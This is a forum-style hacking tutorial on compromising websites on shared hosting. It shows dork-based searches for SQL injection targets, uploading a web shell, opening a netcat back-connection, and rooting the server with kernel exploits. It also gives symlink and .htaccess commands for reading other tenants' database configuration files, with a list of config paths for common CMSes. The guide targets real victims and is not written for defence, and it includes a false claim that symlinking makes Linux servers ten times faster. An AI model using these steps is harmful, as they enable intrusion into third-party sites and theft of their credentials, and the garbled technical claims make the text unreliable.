Now,first free ur time before reading this tutorial.This is a big tutorial ..so that u can learn and hack everything.
1. Introduction.
Most of the hackers who deface websites are script-kiddies, we're now going to take a look how hackers quickly detect vulnerable websites and deface other domains on the system.
2. SQL Injection.
Many people would take as a main the SQL Injection (SQLi) attack. SQLi is very popular and there are many dorks out there.
2.1 Searching for vulnerable websites.
The search is very easy. We just put the dork and try diffrent search results. For quicker results you may use the exploit scanner.
2.2 I want to attack a specific website which is on a shared hosting.
Again the search is very easy. Let's say we have the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:
www.bing.com
In the search field write:
Code:
ip:69.162.119.226 id=
You should get very interesting results which you might attack.
3. Attacking the web application itself.
A very good method to gain access is to attack the web application itself. Even if the websites' web application is up-to-update and you aren't able to exploit it, you can search for vulnerable web applications on the server itself. We'll be using the same method as in the 2.2 .
Let's say we have again the IP 69.162.119.226 with no malicious thoughts on it, of course. We navigate to:
www.bing.com
In the search field write:
Code:
ip:69.162.119.226 "wordpress"
You should get websites powered by wordpress or any other system you have a working exploit on.
4. I've got admin access, now what ?
After you've got admin access, upload a shell.
5. I've got a shell, now what ?
Now it's time to take down your target. You can either:- Root the server.- Get the victims' website configuration database.
5.1 Rooting the server.
First we need to disable the security. There is a good tutorial in this forum, follow it and you'll be fine.
Second we need a back-connection OR we can bind a port. A back connection means that the server connects to you after you have opened the specific port and have launched netcat to listen ( nc -l -v -p PORT ) . Locus shell provides a great interface for begginers. Just upload locus, after which go to back-connection OR bind shell and follow the instructions.
5.1.1 Pwning the kernel.
One of the most popular ways to root a web server is by pwning the kernel if it's a Linux box. To find out the kernel version simply type "uname -a" on your back/bind connection to/from the server. After you've got the version try finding a local root exploit for it. If you can't find, don't give up ... try harder ...
Code:
http://www.exploit-db.com/local/
5.1.2 Getting the victims' database configuration file.
Many of you have heard of "symlinking" . This is actually something like a shortcut on the Windows OS except this term is used in the Linux/Unix Distributions. Symlinking is a necessity in order to the Linux/Unix box to run about 10 times faster. Without it the server will be really slow even with high hardware configuration , which is just pointless.
To get the configuration file, first find out what system is the victim using ( e.g. Wordpress, Joomla, vBulletin etc ). Now go to your shell ( you will have to had disabled the security ) and type in "cat etc/passwd" .
Etc/passwd file contains all usernames on the Linux/Unix box which are created when you get hosting ( usually that's the cpanel username ). Now to get this file you will have to have disabled the security. In this file the usernames aren't long as the domain ones, for e.g.
You have victim website hackers1.com In etc/passwd this can refer to the username:hack1, hak1, hac1, hckrs1, hrs1 etc
So spend some time figuring out the username. After you've got it it's time to get the database config file. You can see the default configuration files list here:
Code:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
After you've got your path, it's time to extract the db information.
Let's assume you're in directory /home/attacker1/public_html/shell.php , where shell.php is your shell and attacker1 is the username of some domain we've just compromised. Doesn't this ring the bell ? The path to the victims' hosting should be /home/victim1/public_html/ where victim1 is your victims' username. Let's execute this command on our shell, assuming the victims' system is vBulletin :
Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt
This command uses symlink and it tells the server "hey, give me the file /config.php and save it as victim1.txt" (symlinking) . Now when you navigate to attacker1.com/victim1.txt you should have their configuration file. Many administrators put some security on their forums/cmses so we're going to break them now ...
5.1.2.1 Htaccess.
The admin of the victim1.com website might have put this htaccess file in the /includes folder:
<Files config.php>order allow, denydeny from all</Files>
When we try to symlink this it will return in a 403 Forbidden Error. So how do we bypass this ? Easy. We create a folder e.g. "hack" . We navigate to "hack" by typing "cd /hack". Next we symlink like this:
Code:
ln -s /home/victim1/public_html/includes/config.php victim1.txt
and we get a 403 Forbidden error ... Now we put this htaccess file in a directory before "hack" for example we are in "/home/attacker1/public_html/hack" and we have to put this htaccess file (below) in "/home/victim1/public_html/" . The htaccess file you have to put:
Code:
HeaderName victim1.txt
Now we navigate to "/home/attacker1/public_html/hack" and click "victim1.txt" and it should load us the configuration file. If you have done a symlink but with a different .txt file, replace your custom name in the htaccess as well e.g. I have done symlink:
Code:
ln -s /home/victim1/public_html/includes/config.php 1.txt
so I have to put htaccess:
HeaderName 1.txt
5.1.2.2 Browse Through Attack - Bypassing ALL Security.
Tired of bypassing everything step by step by step ? Now I'm going to show you a very cool method to bypass ALL security.
Take this scenario as example:
We have disabled all security. But still we can't symlink right. What do we do ?
First we create a folder with a custom named folder like "hack". We enter it via our shell and type in "ln -s / root" . Next we choose a victim domain like victim1.com . We type in " ls -la /etc/valiases/victim1.com ". Now we navigate one folder back and put this htaccess file in the "hack" folder:
Options Indexes FollowSymLinksDirectoryIndex test.htmAddType txt .phpAddHandler txt .php
Now if we are in "/home/attacker1/public_html/" this equals to "attacker1.com" . So we want to navigate to the "hack" folder and we type in the URL "attacker1.com/hack" and we see a "folder" which actually is a symlink called "root". Don't get too happy, we still have got restricted permissions to some folders. Now to "browse through" their hole hosting space we just navigate to "attacker1.com/hack/root/home/victim1/public_html/".
Fr34k1ng pwn3d . Now you can browse through his website without worrying about IP restrictions with htaccess file. Although if there is htaccess because of which you have to enter username and password, you have to find a way to bypass that yourself. OK so you're browsing through and you are in "/includes/" and you find "config.php". You click on it but it gives you a BLANK page. WTF ?! Not exactly. Right-click and select "view source" and the configuration file is there .
6. Is this is it ? Is it really this simple ?
Yes, this is it, nothing complicated. This is the way most hackers "deface", "root" or whatever they do to websites/forums.
credit to Ghost-protocol
Post a Comment